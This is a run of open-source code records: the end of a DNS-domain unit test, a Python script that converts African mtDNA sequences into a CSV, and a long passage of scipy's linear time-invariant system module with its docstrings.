dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertEqual('domain', dnsd.domain)
self.assertEqual('zone', dnsd.availability_zone)
def test_register_for_project(self):
dns_domain.DNSDomain.register_for_project(self.context.elevated(),
'domain', 'project')
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertEqual('domain', dnsd.domain)
self.assertEqual('project', dnsd.project_id)
def test_delete_by_domain(self):
dns_domain.DNSDomain.register_for_zone(self.context.elevated(),
'domain', 'zone')
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertEqual('domain', dnsd.domain)
self.assertEqual('zone', dnsd.availability_zone)
dns_domain.DNSDomain.delete_by_domain(self.context.elevated(),
'domain')
dnsd = dns_domain.DNSDomain.get_by_domain(self.context, 'domain')
self.assertIsNone(dnsd)
def test_get_all(self):
with mock.patch.object(db, 'dnsdomain_get_all') as get:
get.return_value = [fake_dnsd]
dns_domain.DNSDomainList.get_all(self.context)
class TestDNSDomainObject(test_objects._LocalTest,
_TestDNSDomain):
pass
class TestRemoteDNSDomainObject(test_objects._RemoteTest,
_TestDNSDomain):
pass
| apache-2.0 |
ryanraaum/african-mtdna | popdata_sources/lippold2014/process.py | 1 | 1543 | from oldowan.mtconvert import seq2sites, sites2seq, str2sites
from oldowan.fasta import fasta
from string import translate
import pandas as pd
import sys
sys.path.append('../../scripts')
from utils import *
## load metadata
metadata = pd.read_csv('metadata.csv', index_col=0)
region = range2region(metadata.ix[0, 'SeqRange'])
## load sample info
sinfo = pd.read_csv('HGDP_info.csv', index_col=0)
newindices = ['HGDP' + str(x).zfill(5) for x in sinfo.index]
sinfo['hgdpid'] = newindices
sinfo = sinfo.set_index('hgdpid')
ff = fasta('hgdp_africa.fasta', 'r')
data = ff.readentries()
ff.close()
hids = []
sites = []
for entry in data:
words = entry['name'].split()
hids.append(words[4])
sites.append(seq2sites(entry['sequence']))
# three sequences have an 'N' at around 309 that breaks validation
# this will be treated as a heteroplasy of the T there and ignored
skip = [64, 67, 73]
# validate
passed_validation = True
for i in range(len(sites)):
if i not in skip:
seq1 = data[i]['sequence'].upper()
if not seq1 == translate(sites2seq(sites[i], region), None, '-'):
passed_validation = False
print i, hids[i]
counter = {}
for k in metadata.index:
counter[k] = 0
if passed_validation:
with open('processed.csv', 'w') as f:
for i in range(len(sites)):
hid = hids[i]
key = sinfo.ix[hid,'PopulationName']
prefix = metadata.ix[key,'NewPrefix']
counter[key] += 1
newid = prefix + str(counter[key]).zfill(3)
mysites = ' '.join([str(x) for x in sites[i]])
f.write('%s,%s,%s\n' % (newid, hid, mysites)) | cc0-1.0 |
mbayon/TFG-MachineLearning | venv/lib/python3.6/site-packages/scipy/signal/ltisys.py | 7 | 116413 | """
ltisys -- a collection of classes and functions for modeling linear
time invariant systems.
"""
from __future__ import division, print_function, absolute_import
#
# Author: Travis Oliphant 2001
#
# Feb 2010: Warren Weckesser
# Rewrote lsim2 and added impulse2.
# Apr 2011: Jeffrey Armstrong <jeff@approximatrix.com>
# Added dlsim, dstep, dimpulse, cont2discrete
# Aug 2013: Juan Luis Cano
# Rewrote abcd_normalize.
# Jan 2015: Irvin Probst irvin DOT probst AT ensta-bretagne DOT fr
# Added pole placement
# Mar 2015: Clancy Rowley
# Rewrote lsim
# May 2015: Felix Berkenkamp
# Split lti class into subclasses
# Merged discrete systems and added dlti
import warnings
# np.linalg.qr fails on some tests with LinAlgError: zgeqrf returns -7
# use scipy's qr until this is solved
from scipy.linalg import qr as s_qr
from scipy import integrate, interpolate, linalg
from scipy.interpolate import interp1d
from scipy._lib.six import xrange
from .filter_design import (tf2zpk, zpk2tf, normalize, freqs, freqz, freqs_zpk,
freqz_zpk)
from .lti_conversion import (tf2ss, abcd_normalize, ss2tf, zpk2ss, ss2zpk,
cont2discrete)
import numpy
import numpy as np
from numpy import (real, atleast_1d, atleast_2d, squeeze, asarray, zeros,
dot, transpose, ones, zeros_like, linspace, nan_to_num)
import copy
__all__ = ['lti', 'dlti', 'TransferFunction', 'ZerosPolesGain', 'StateSpace',
'lsim', 'lsim2', 'impulse', 'impulse2', 'step', 'step2', 'bode',
'freqresp', 'place_poles', 'dlsim', 'dstep', 'dimpulse',
'dfreqresp', 'dbode']
class LinearTimeInvariant(object):
def __new__(cls, *system, **kwargs):
"""Create a new object, don't allow direct instances."""
if cls is LinearTimeInvariant:
raise NotImplementedError('The LinearTimeInvariant class is not '
'meant to be used directly, use `lti` '
'or `dlti` instead.')
return super(LinearTimeInvariant, cls).__new__(cls)
def __init__(self):
"""
Initialize the `lti` baseclass.
The heavy lifting is done by the subclasses.
"""
super(LinearTimeInvariant, self).__init__()
self.inputs = None
self.outputs = None
self._dt = None
@property
def dt(self):
"""Return the sampling time of the system, `None` for `lti` systems."""
return self._dt
@property
def _dt_dict(self):
if self.dt is None:
return {}
else:
return {'dt': self.dt}
@property
def zeros(self):
"""Zeros of the system."""
return self.to_zpk().zeros
@property
def poles(self):
"""Poles of the system."""
return self.to_zpk().poles
def _as_ss(self):
"""Convert to `StateSpace` system, without copying.
Returns
-------
sys: StateSpace
The `StateSpace` system. If the class is already an instance of
`StateSpace` then this instance is returned.
"""
if isinstance(self, StateSpace):
return self
else:
return self.to_ss()
def _as_zpk(self):
"""Convert to `ZerosPolesGain` system, without copying.
Returns
-------
sys: ZerosPolesGain
The `ZerosPolesGain` system. If the class is already an instance of
`ZerosPolesGain` then this instance is returned.
"""
if isinstance(self, ZerosPolesGain):
return self
else:
return self.to_zpk()
def _as_tf(self):
"""Convert to `TransferFunction` system, without copying.
Returns
-------
sys: ZerosPolesGain
The `TransferFunction` system. If the class is already an instance of
`TransferFunction` then this instance is returned.
"""
if isinstance(self, TransferFunction):
return self
else:
return self.to_tf()
class lti(LinearTimeInvariant):
"""
Continuous-time linear time invariant system base class.
Parameters
----------
*system : arguments
The `lti` class can be instantiated with either 2, 3 or 4 arguments.
The following gives the number of arguments and the corresponding
continuous-time subclass that is created:
* 2: `TransferFunction`: (numerator, denominator)
* 3: `ZerosPolesGain`: (zeros, poles, gain)
* 4: `StateSpace`: (A, B, C, D)
Each argument can be an array or a sequence.
See Also
--------
ZerosPolesGain, StateSpace, TransferFunction, dlti
Notes
-----
`lti` instances do not exist directly. Instead, `lti` creates an instance
of one of its subclasses: `StateSpace`, `TransferFunction` or
`ZerosPolesGain`.
If (numerator, denominator) is passed in for ``*system``, coefficients for
both the numerator and denominator should be specified in descending
exponent order (e.g., ``s^2 + 3s + 5`` would be represented as ``[1, 3,
5]``).
Changing the value of properties that are not directly part of the current
system representation (such as the `zeros` of a `StateSpace` system) is
very inefficient and may lead to numerical inaccuracies. It is better to
convert to the specific system representation first. For example, call
``sys = sys.to_zpk()`` before accessing/changing the zeros, poles or gain.
Examples
--------
>>> from scipy import signal
>>> signal.lti(1, 2, 3, 4)
StateSpaceContinuous(
array([[1]]),
array([[2]]),
array([[3]]),
array([[4]]),
dt: None
)
>>> signal.lti([1, 2], [3, 4], 5)
ZerosPolesGainContinuous(
array([1, 2]),
array([3, 4]),
5,
dt: None
)
>>> signal.lti([3, 4], [1, 2])
TransferFunctionContinuous(
array([ 3., 4.]),
array([ 1., 2.]),
dt: None
)
"""
def __new__(cls, *system):
"""Create an instance of the appropriate subclass."""
if cls is lti:
N = len(system)
if N == 2:
return TransferFunctionContinuous.__new__(
TransferFunctionContinuous, *system)
elif N == 3:
return ZerosPolesGainContinuous.__new__(
ZerosPolesGainContinuous, *system)
elif N == 4:
return StateSpaceContinuous.__new__(StateSpaceContinuous,
*system)
else:
raise ValueError("`system` needs to be an instance of `lti` "
"or have 2, 3 or 4 arguments.")
# __new__ was called from a subclass, let it call its own functions
return super(lti, cls).__new__(cls)
def __init__(self, *system):
"""
Initialize the `lti` baseclass.
The heavy lifting is done by the subclasses.
"""
super(lti, self).__init__(*system)
def impulse(self, X0=None, T=None, N=None):
"""
Return the impulse response of a continuous-time system.
See `impulse` for details.
"""
return impulse(self, X0=X0, T=T, N=N)
def step(self, X0=None, T=None, N=None):
"""
Return the step response of a continuous-time system.
See `step` for details.
"""
return step(self, X0=X0, T=T, N=N)
def output(self, U, T, X0=None):
"""
Return the response of a continuous-time system to input `U`.
See `lsim` for details.
"""
return lsim(self, U, T, X0=X0)
def bode(self, w=None, n=100):
"""
Calculate Bode magnitude and phase data of a continuous-time system.
Returns a 3-tuple containing arrays of frequencies [rad/s], magnitude
[dB] and phase [deg]. See `bode` for details.
Examples
--------
>>> from scipy import signal
>>> import matplotlib.pyplot as plt
>>> sys = signal.TransferFunction([1], [1, 1])
>>> w, mag, phase = sys.bode()
>>> plt.figure()
>>> plt.semilogx(w, mag) # Bode magnitude plot
>>> plt.figure()
>>> plt.semilogx(w, phase) # Bode phase plot
>>> plt.show()
"""
return bode(self, w=w, n=n)
def freqresp(self, w=None, n=10000):
"""
Calculate the frequency response of a continuous-time system.
Returns a 2-tuple containing arrays of frequencies [rad/s] and
complex magnitude.
See `freqresp` for details.
"""
return freqresp(self, w=w, n=n)
def to_discrete(self, dt, method='zoh', alpha=None):
"""Return a discretized version of the current system.
Parameters: See `cont2discrete` for details.
Returns
-------
sys: instance of `dlti`
"""
raise NotImplementedError('to_discrete is not implemented for this '
'system class.')
class dlti(LinearTimeInvariant):
"""
Discrete-time linear time invariant system base class.
Parameters
----------
*system: arguments
The `dlti` class can be instantiated with either 2, 3 or 4 arguments.
The following gives the number of arguments and the corresponding
discrete-time subclass that is created:
* 2: `TransferFunction`: (numerator, denominator)
* 3: `ZerosPolesGain`: (zeros, poles, gain)
* 4: `StateSpace`: (A, B, C, D)
Each argument can be an array or a sequence.
dt: float, optional
Sampling time [s] of the discrete-time systems. Defaults to ``True``
(unspecified sampling time). Must be specified as a keyword argument,
for example, ``dt=0.1``.
See Also
--------
ZerosPolesGain, StateSpace, TransferFunction, lti
Notes
-----
`dlti` instances do not exist directly. Instead, `dlti` creates an instance
of one of its subclasses: `StateSpace`, `TransferFunction` or
`ZerosPolesGain`.
Changing the value of properties that are not directly part of the current
system representation (such as the `zeros` of a `StateSpace` system) is
very inefficient and may lead to numerical inaccuracies. It is better to
convert to the specific system representation first. For example, call
``sys = sys.to_zpk()`` before accessing/changing the zeros, poles or gain.
If (numerator, denominator) is passed in for ``*system``, coefficients for
both the numerator and denominator should be specified in descending
exponent order (e.g., ``z^2 + 3z + 5`` would be represented as ``[1, 3,
5]``).
.. versionadded:: 0.18.0
Examples
--------
>>> from scipy import signal
>>> signal.dlti(1, 2, 3, 4)
StateSpaceDiscrete(
array([[1]]),
array([[2]]),
array([[3]]),
array([[4]]),
dt: True
)
>>> signal.dlti(1, 2, 3, 4, dt=0.1)
StateSpaceDiscrete(
array([[1]]),
array([[2]]),
array([[3]]),
array([[4]]),
dt: 0.1
)
>>> signal.dlti([1, 2], [3, 4], 5, dt=0.1)
ZerosPolesGainDiscrete(
array([1, 2]),
array([3, 4]),
5,
dt: 0.1
)
>>> signal.dlti([3, 4], [1, 2], dt=0.1)
TransferFunctionDiscrete(
array([ 3., 4.]),
array([ 1., 2.]),
dt: 0.1
)
"""
def __new__(cls, *system, **kwargs):
"""Create an instance of the appropriate subclass."""
if cls is dlti:
N = len(system)
if N == 2:
return TransferFunctionDiscrete.__new__(
TransferFunctionDiscrete, *system, **kwargs)
elif N == 3:
return ZerosPolesGainDiscrete.__new__(ZerosPolesGainDiscrete,
*system, **kwargs)
elif N == 4:
return StateSpaceDiscrete.__new__(StateSpaceDiscrete, *system,
**kwargs)
else:
raise ValueError("`system` needs to be an instance of `dlti` "
"or have 2, 3 or 4 arguments.")
# __new__ was called from a subclass, let it call its own functions
return super(dlti, cls).__new__(cls)
def __init__(self, *system, **kwargs):
"""
Initialize the `lti` baseclass.
The heavy lifting is done by the subclasses.
"""
dt = kwargs.pop('dt', True)
super(dlti, self).__init__(*system, **kwargs)
self.dt = dt
@property
def dt(self):
"""Return the sampling time of the system."""
return self._dt
@dt.setter
def dt(self, dt):
self._dt = dt
def impulse(self, x0=None, t=None, n=None):
"""
Return the impulse response of the discrete-time `dlti` system.
See `dimpulse` for details.
"""
return dimpulse(self, x0=x0, t=t, n=n)
def step(self, x0=None, t=None, n=None):
"""
Return the step response of the discrete-time `dlti` system.
See `dstep` for details.
"""
return dstep(self, x0=x0, t=t, n=n)
def output(self, u, t, x0=None):
"""
Return the response of the discrete-time system to input `u`.
See `dlsim` for details.
"""
return dlsim(self, u, t, x0=x0)
def bode(self, w=None, n=100):
"""
Calculate Bode magnitude and phase data of a discrete-time system.
Returns a 3-tuple containing arrays of frequencies [rad/s], magnitude
[dB] and phase [deg]. See `dbode` for details.
Examples
--------
>>> from scipy import signal
>>> import matplotlib.pyplot as plt
Transfer function: H(z) = 1 / (z^2 + 2z + 3) with sampling time 0.5s
>>> sys = signal.TransferFunction([1], [1, 2, 3], dt=0.5)
Equivalent: signal.dbode(sys)
>>> w, mag, phase = sys.bode()
>>> plt.figure()
>>> plt.semilogx(w, mag) # Bode magnitude plot
>>> plt.figure()
>>> plt.semilogx(w, phase) # Bode phase plot
>>> plt.show()
"""
return dbode(self, w=w, n=n)
def freqresp(self, w=None, n=10000, whole=False):
"""
Calculate the frequency response of a discrete-time system.
Returns a 2-tuple containing arrays of frequencies [rad/s] and
complex magnitude.
See `dfreqresp` for details.
"""
return dfreqresp(self, w=w, n=n, whole=whole)
class TransferFunction(LinearTimeInvariant):
r"""Linear Time Invariant system class in transfer function form.
Represents the system as the continuous-time transfer function
:math:`H(s)=\sum_{i=0}^N b[N-i] s^i / \sum_{j=0}^M a[M-j] s^j` or the
discrete-time transfer function
:math:`H(s)=\sum_{i=0}^N b[N-i] z^i / \sum_{j=0}^M a[M-j] z^j`, where
:math:`b` are elements of the numerator `num`, :math:`a` are elements of
the denominator `den`, and ``N == len(b) - 1``, ``M == len(a) - 1``.
`TransferFunction` systems inherit additional
functionality from the `lti`, respectively the `dlti` classes, depending on
which system representation is used.
Parameters
----------
*system: arguments
The `TransferFunction` class can be instantiated with 1 or 2
arguments. The following gives the number of input arguments and their
interpretation:
* 1: `lti` or `dlti` system: (`StateSpace`, `TransferFunction` or
`ZerosPolesGain`)
* 2: array_like: (numerator, denominator)
dt: float, optional
Sampling time [s] of the discrete-time systems. Defaults to `None`
(continuous-time). Must be specified as a keyword argument, for
example, ``dt=0.1``.
See Also
--------
ZerosPolesGain, StateSpace, lti, dlti
tf2ss, tf2zpk, tf2sos
Notes
-----
Changing the value of properties that are not part of the
`TransferFunction` system representation (such as the `A`, `B`, `C`, `D`
state-space matrices) is very inefficient and may lead to numerical
inaccuracies. It is better to convert to the specific system
representation first. For example, call ``sys = sys.to_ss()`` before
accessing/changing the A, B, C, D system matrices.
If (numerator, denominator) is passed in for ``*system``, coefficients
for both the numerator and denominator should be specified in descending
exponent order (e.g. ``s^2 + 3s + 5`` or ``z^2 + 3z + 5`` would be
represented as ``[1, 3, 5]``)
Examples
--------
Construct the transfer function:
.. math:: H(s) = \frac{s^2 + 3s + 3}{s^2 + 2s + 1}
>>> from scipy import signal
>>> num = [1, 3, 3]
>>> den = [1, 2, 1]
>>> signal.TransferFunction(num, den)
TransferFunctionContinuous(
array([ 1., 3., 3.]),
array([ 1., 2., 1.]),
dt: None
)
Contruct the transfer function with a sampling time of 0.1 seconds:
.. math:: H(z) = \frac{z^2 + 3z + 3}{z^2 + 2z + 1}
>>> signal.TransferFunction(num, den, dt=0.1)
TransferFunctionDiscrete(
array([ 1., 3., 3.]),
array([ 1., 2., 1.]),
dt: 0.1
)
"""
def __new__(cls, *system, **kwargs):
"""Handle object conversion if input is an instance of lti."""
if len(system) == 1 and isinstance(system[0], LinearTimeInvariant):
return system[0].to_tf()
# Choose whether to inherit from `lti` or from `dlti`
if cls is TransferFunction:
if kwargs.get('dt') is None:
return TransferFunctionContinuous.__new__(
TransferFunctionContinuous,
*system,
**kwargs)
else:
return TransferFunctionDiscrete.__new__(
TransferFunctionDiscrete,
*system,
**kwargs)
# No special conversion needed
return super(TransferFunction, cls).__new__(cls)
def __init__(self, *system, **kwargs):
"""Initialize the state space LTI system."""
# Conversion of lti instances is handled in __new__
if isinstance(system[0], LinearTimeInvariant):
return
# Remove system arguments, not needed by parents anymore
super(TransferFunction, self).__init__(**kwargs)
self._num = None
self._den = None
self.num, self.den = normalize(*system)
def __repr__(self):
"""Return representation of the system's transfer function"""
return '{0}(\n{1},\n{2},\ndt: {3}\n)'.format(
self.__class__.__name__,
repr(self.num),
repr(self.den),
repr(self.dt),
)
@property
def num(self):
"""Numerator of the `TransferFunction` system."""
return self._num
@num.setter
def num(self, num):
self._num = atleast_1d(num)
# Update dimensions
if len(self.num.shape) > 1:
self.outputs, self.inputs = self.num.shape
else:
self.outputs = 1
self.inputs = 1
@property
def den(self):
"""Denominator of the `TransferFunction` system."""
return self._den
@den.setter
def den(self, den):
self._den = atleast_1d(den)
def _copy(self, system):
"""
Copy the parameters of another `TransferFunction` object
Parameters
----------
system : `TransferFunction`
The `StateSpace` system that is to be copied
"""
self.num = system.num
self.den = system.den
def to_tf(self):
"""
Return a copy of the current `TransferFunction` system.
Returns
-------
sys : instance of `TransferFunction`
The current system (copy)
"""
return copy.deepcopy(self)
def to_zpk(self):
"""
Convert system representation to `ZerosPolesGain`.
Returns
-------
sys : instance of `ZerosPolesGain`
Zeros, poles, gain representation of the current system
"""
return ZerosPolesGain(*tf2zpk(self.num, self.den),
**self._dt_dict)
def to_ss(self):
"""
Convert system representation to `StateSpace`.
Returns
-------
sys : instance of `StateSpace`
State space model of the current system
"""
return StateSpace(*tf2ss(self.num, self.den),
**self._dt_dict)
@staticmethod
def _z_to_zinv(num, den):
"""Change a transfer function from the variable `z` to `z**-1`.
Parameters
----------
num, den: 1d array_like
Sequences representing the coefficients of the numerator and
denominator polynomials, in order of descending degree of 'z'.
That is, ``5z**2 + 3z + 2`` is presented as ``[5, 3, 2]``.
Returns
-------
num, den: 1d array_like
Sequences representing the coefficients of the numerator and
denominator polynomials, in order of ascending degree of 'z**-1'.
That is, ``5 + 3 z**-1 + 2 z**-2`` is presented as ``[5, 3, 2]``.
"""
diff = len(num) - len(den)
if diff > 0:
den = np.hstack((np.zeros(diff), den))
elif diff < 0:
num = np.hstack((np.zeros(-diff), num))
return num, den
@staticmethod
def _zinv_to_z(num, den):
"""Change a transfer function from the variable `z` to `z**-1`.
Parameters
----------
num, den: 1d array_like
Sequences representing the coefficients of the numerator and
denominator polynomials, in order of ascending degree of 'z**-1'.
That is, ``5 + 3 z**-1 + 2 z**-2`` is presented as ``[5, 3, 2]``.
Returns
-------
num, den: 1d array_like
Sequences representing the coefficients of the numerator and
denominator polynomials, in order of descending degree of 'z'.
That is, ``5z**2 + 3z + 2`` is presented as ``[5, 3, 2]``.
"""
diff = len(num) - len(den)
if diff > 0:
den = np.hstack((den, np.zeros(diff)))
elif diff < 0:
num = np.hstack((num, np.zeros(-diff)))
return num, den
class TransferFunctionContinuous(TransferFunction, lti):
r"""
Continuous-time Linear Time Invariant system in transfer function form.
Represents the system as the transfer function
:math:`H(s)=\sum_{i=0}^N b[N-i] s^i / \sum_{j=0}^M a[M-j] s^j`, where
:math:`b` are elements of the numerator `num`, :math:`a` are elements of
the denominator `den`, and ``N == len(b) - 1``, ``M == len(a) - 1``.
Continuous-time `TransferFunction` systems inherit additional
functionality from the `lti` class.
Parameters
----------
*system: arguments
The `TransferFunction` class can be instantiated with 1 or 2
arguments. The following gives the number of input arguments and their
interpretation:
* 1: `lti` system: (`StateSpace`, `TransferFunction` or
`ZerosPolesGain`)
* 2: array_like: (numerator, denominator)
See Also
--------
ZerosPolesGain, StateSpace, lti
tf2ss, tf2zpk, tf2sos
Notes
-----
Changing the value of properties that are not part of the
`TransferFunction` system representation (such as the `A`, `B`, `C`, `D`
state-space matrices) is very inefficient and may lead to numerical
inaccuracies. It is better to convert to the specific system
representation first. For example, call ``sys = sys.to_ss()`` before
accessing/changing the A, B, C, D system matrices.
If (numerator, denominator) is passed in for ``*system``, coefficients
for both the numerator and denominator should be specified in descending
exponent order (e.g. ``s^2 + 3s + 5`` would be represented as
``[1, 3, 5]``)
Examples
--------
Construct the transfer function:
.. math:: H(s) = \frac{s^2 + 3s + 3}{s^2 + 2s + 1}
>>> from scipy import signal
>>> num = [1, 3, 3]
>>> den = [1, 2, 1]
>>> signal.TransferFunction(num, den)
TransferFunctionContinuous(
array([ 1., 3., 3.]),
array([ 1., 2., 1.]),
dt: None
)
"""
def to_discrete(self, dt, method='zoh', alpha=None):
"""
Returns the discretized `TransferFunction` system.
Parameters: See `cont2discrete` for details.
Returns
-------
sys: instance of `dlti` and `StateSpace`
"""
return TransferFunction(*cont2discrete((self.num, self.den),
dt,
method=method,
alpha=alpha)[:-1],
dt=dt)
class TransferFunctionDiscrete(TransferFunction, dlti):
r"""
Discrete-time Linear Time Invariant system in transfer function form.
Represents the system as the transfer function
:math:`H(z)=\sum_{i=0}^N b[N-i] z^i / \sum_{j=0}^M a[M-j] z^j`, where
:math:`b` are elements of the numerator `num`, :math:`a` are elements of
the denominator `den`, and ``N == len(b) - 1``, ``M == len(a) - 1``.
Discrete-time `TransferFunction` systems inherit additional functionality
from the `dlti` class.
Parameters
----------
*system: arguments
The `TransferFunction` class can be instantiated with 1 or 2
arguments. The following gives the number of input arguments and their
interpretation:
* 1: `dlti` system: (`StateSpace`, `TransferFunction` or
`ZerosPolesGain`)
* 2: array_like: (numerator, denominator)
dt: float, optional
Sampling time [s] of the discrete-time systems. Defaults to `True`
(unspecified sampling time). Must be specified as a keyword argument,
for example, ``dt=0.1``.
See Also
--------
ZerosPolesGain, StateSpace, dlti
tf2ss, tf2zpk, tf2sos
Notes
-----
Changing the value of properties that are not part of the
`TransferFunction` system representation (such as the `A`, `B`, `C`, `D`
state-space matrices) is very inefficient and may lead to numerical
inaccuracies.
If (numerator, denominator) is passed in for ``*system``, coefficients
for both the numerator and denominator should be specified in descending
exponent order (e.g., ``z^2 + 3z + 5`` would be represented as
``[1, 3, 5]``).
Examples
--------
Construct the transfer function with a sampling time of 0.5 seconds:
.. math:: H(z) = \frac{z^2 + 3z + 3}{z^2 + 2z + 1}
>>> from scipy import signal
>>> num = [1, 3, 3]
>>> den = [1, 2, 1]
>>> signal.TransferFunction(num, den, 0.5)
TransferFunctionDiscrete(
array([ 1., 3., 3.]),
array([ 1., 2., 1.]),
dt: 0.5
)
"""
pass
class ZerosPolesGain(LinearTimeInvariant):
r"""
Linear Time Invariant system class in zeros, poles, gain form.
Represents the system as the continuous- or discrete-time transfer function
:math:`H(s)=k \prod_i (s - z[i]) / \prod_j (s - p[j])`, where :math:`k` is
the `gain`, :math:`z` are the `zeros` and :math:`p` are the `poles`.
`ZerosPolesGain` systems inherit additional functionality from the `lti`,
respectively the `dlti` classes, depending on which system representation
is used.
Parameters
----------
*system : arguments
The `ZerosPolesGain` class can be instantiated with 1 or 3
arguments. The following gives the number of input arguments and their
interpretation:
* 1: `lti` or `dlti` system: (`StateSpace`, `TransferFunction` or
`ZerosPolesGain`)
* 3: array_like: (zeros, poles, gain)
dt: float, optional
Sampling time [s] of the discrete-time systems. Defaults to `None`
(continuous-time). Must be specified as a keyword argument, for
example, ``dt=0.1``.
See Also
--------
TransferFunction, StateSpace, lti, dlti
zpk2ss, zpk2tf, zpk2sos
Notes
-----
Changing the value of properties that are not part of the
`ZerosPolesGain` system representation (such as the `A`, `B`, `C`, `D`
state-space matrices) is very inefficient and may lead to numerical
inaccuracies. It is better to convert to the specific system
representation first. For example, call ``sys = sys.to_ss()`` before
accessing/changing the A, B, C, D system matrices.
Examples
--------
>>> from scipy import signal
Transfer function: H(s) = 5(s - 1)(s - 2) / (s - 3)(s - 4)
>>> signal.ZerosPolesGain([1, 2], [3, 4], 5)
ZerosPolesGainContinuous(
array([1, 2]),
array([3, 4]),
5,
dt: None
)
Transfer function: H(z) = 5(z - 1)(z - 2) / (z - 3)(z - 4)
>>> signal.ZerosPolesGain([1, 2], [3, 4], 5, dt=0.1)
ZerosPolesGainDiscrete(
array([1, 2]),
array([3, 4]),
5,
dt: 0.1
)
"""
def __new__(cls, *system, **kwargs):
"""Handle object conversion if input is an instance of `lti`"""
if len(system) == 1 and isinstance(system[0], LinearTimeInvariant):
return system[0].to_zpk()
# Choose whether to inherit from `lti` or from `dlti`
if cls is ZerosPolesGain:
if kwargs.get('dt') is None:
return ZerosPolesGainContinuous.__new__(
ZerosPolesGainContinuous,
*system,
**kwargs)
else:
return ZerosPolesGainDiscrete.__new__(
ZerosPolesGainDiscrete,
*system,
**kwargs
)
# No special conversion needed
return super(ZerosPolesGain, cls).__new__(cls)
def __init__(self, *system, **kwargs):
"""Initialize the zeros, poles, gain system."""
# Conversion of lti instances is handled in __new__
if isinstance(system[0], LinearTimeInvariant):
return
super(ZerosPolesGain, self).__init__(**kwargs)
self._zeros = None
self._poles = None
self._gain = None
self.zeros, self.poles, self.gain = system
def __repr__(self):
"""Return representation of the `ZerosPolesGain` system."""
return '{0}(\n{1},\n{2},\n{3},\ndt: {4}\n)'.format(
self.__class__.__name__,
repr(self.zeros),
repr(self.poles),
repr(self.gain),
repr(self.dt),
)
@property
def zeros(self):
"""Zeros of the `ZerosPolesGain` system."""
return self._zeros
@zeros.setter
def zeros(self, zeros):
self._zeros = atleast_1d(zeros)
# Update dimensions
if len(self.zeros.shape) > 1:
self.outputs, self.inputs = self.zeros.shape
else:
self.outputs = 1
self.inputs = 1
@property
def poles(self):
"""Poles of the `ZerosPolesGain` system."""
return self._poles
@poles.setter
def poles(self, poles):
self._poles = atleast_1d(poles)
@property
def gain(self):
"""Gain of the `ZerosPolesGain` system."""
return self._gain
@gain.setter
def gain(self, gain):
self._gain = gain
def _copy(self, system):
"""
Copy the parameters of another `ZerosPolesGain` system.
Parameters
----------
system : instance of `ZerosPolesGain`
The zeros, poles gain system that is to be copied
"""
self.poles = system.poles
self.zeros = system.zeros
self.gain = system.gain
def to_tf(self):
"""
Convert system representation to `TransferFunction`.
Returns
-------
sys : instance of `TransferFunction`
Transfer function of the current system
"""
return TransferFunction(*zpk2tf(self.zeros, self.poles, self.gain),
**self._dt_dict)
def to_zpk(self):
"""
Return a copy of the current 'ZerosPolesGain' system.
Returns
-------
sys : instance of `ZerosPolesGain`
The current system (copy)
"""
return copy.deepcopy(self)
def to_ss(self):
"""
Convert system representation to `StateSpace`.
Returns
-------
sys : instance of `StateSpace`
State space model of the current system
"""
return StateSpace(*zpk2ss(self.zeros, self.poles, self.gain),
**self._dt_dict)
class ZerosPolesGainContinuous(ZerosPolesGain, lti):
r"""
Continuous-time Linear Time Invariant system in zeros, poles, gain form.
Represents the system as the continuous time transfer function
:math:`H(s)=k \prod_i (s - z[i]) / \prod_j (s - p[j])`, where :math:`k` is
the `gain`, :math:`z` are the `zeros` and :math:`p` are the `poles`.
Continuous-time `ZerosPolesGain` systems inherit additional functionality
from the `lti` class.
Parameters
----------
*system : arguments
The `ZerosPolesGain` class can be instantiated with 1 or 3
arguments. The following gives the number of input arguments and their
interpretation:
* 1: `lti` system: (`StateSpace`, `TransferFunction` or
`ZerosPolesGain`)
* 3: array_like: (zeros, poles, gain)
See Also
--------
TransferFunction, StateSpace, lti
zpk2ss, zpk2tf, zpk2sos
Notes
-----
Changing the value of properties that are not part of the
`ZerosPolesGain` system representation (such as the `A`, `B`, `C`, `D`
state-space matrices) is very inefficient and may lead to numerical
inaccuracies. It is better to convert to the specific system
representation first. For example, call ``sys = sys.to_ss()`` before
accessing/changing the A, B, C, D system matrices.
Examples
--------
>>> from scipy import signal
Transfer function: H(s) = 5(s - 1)(s - 2) / (s - 3)(s - 4)
>>> signal.ZerosPolesGain([1, 2], [3, 4], 5)
ZerosPolesGainContinuous(
array([1, 2]),
array([3, 4]),
5,
dt: None
)
"""
def to_discrete(self, dt, method='zoh', alpha=None):
"""
Returns the discretized `ZerosPolesGain` system.
Parameters: See `cont2discrete` for details.
Returns
-------
sys: instance of `dlti` and `ZerosPolesGain`
"""
return ZerosPolesGain(
*cont2discrete((self.zeros, self.poles, self.gain),
dt,
method=method,
alpha=alpha)[:-1],
dt=dt)
class ZerosPolesGainDiscrete(ZerosPolesGain, dlti):
r"""
Discrete-time Linear Time Invariant system in zeros, poles, gain form.
Represents the system as the discrete-time transfer function
:math:`H(s)=k \prod_i (s - z[i]) / \prod_j (s - p[j])`, where :math:`k` is
the `gain`, :math:`z` are the `zeros` and :math:`p` are the `poles`.
Discrete-time `ZerosPolesGain` systems inherit additional functionality
from the `dlti` class.
Parameters
----------
*system : arguments
The `ZerosPolesGain` class can be instantiated with 1 or 3
arguments. The following gives the number of input arguments and their
interpretation:
* 1: `dlti` system: (`StateSpace`, `TransferFunction` or
`ZerosPolesGain`)
* 3: array_like: (zeros, poles, gain)
dt: float, optional
Sampling time [s] of the discrete-time systems. Defaults to `True`
(unspecified sampling time). Must be specified as a keyword argument,
for example, ``dt=0.1``.
See Also
--------
TransferFunction, StateSpace, dlti
zpk2ss, zpk2tf, zpk2sos
Notes
-----
Changing the value of properties that are not part of the
`ZerosPolesGain` system representation (such as the `A`, `B`, `C`, `D`
state-space matrices) is very inefficient and may lead to numerical
inaccuracies. It is better to convert to the specific system
representation first. For example, call ``sys = sys.to_ss()`` before
accessing/changing the A, B, C, D system matrices.
Examples
--------
>>> from scipy import signal
Transfer function: H(s) = 5(s - 1)(s - 2) / (s - 3)(s - 4)
>>> signal.ZerosPolesGain([1, 2], [3, 4], 5)
ZerosPolesGainContinuous(
array([1, 2]),
array([3, 4]),
5,
dt: None
)
Transfer function: H(z) = 5(z - 1)(z - 2) / (z - 3)(z - 4)
>>> signal.ZerosPolesGain([1, 2], [3, 4], 5, dt=0.1)
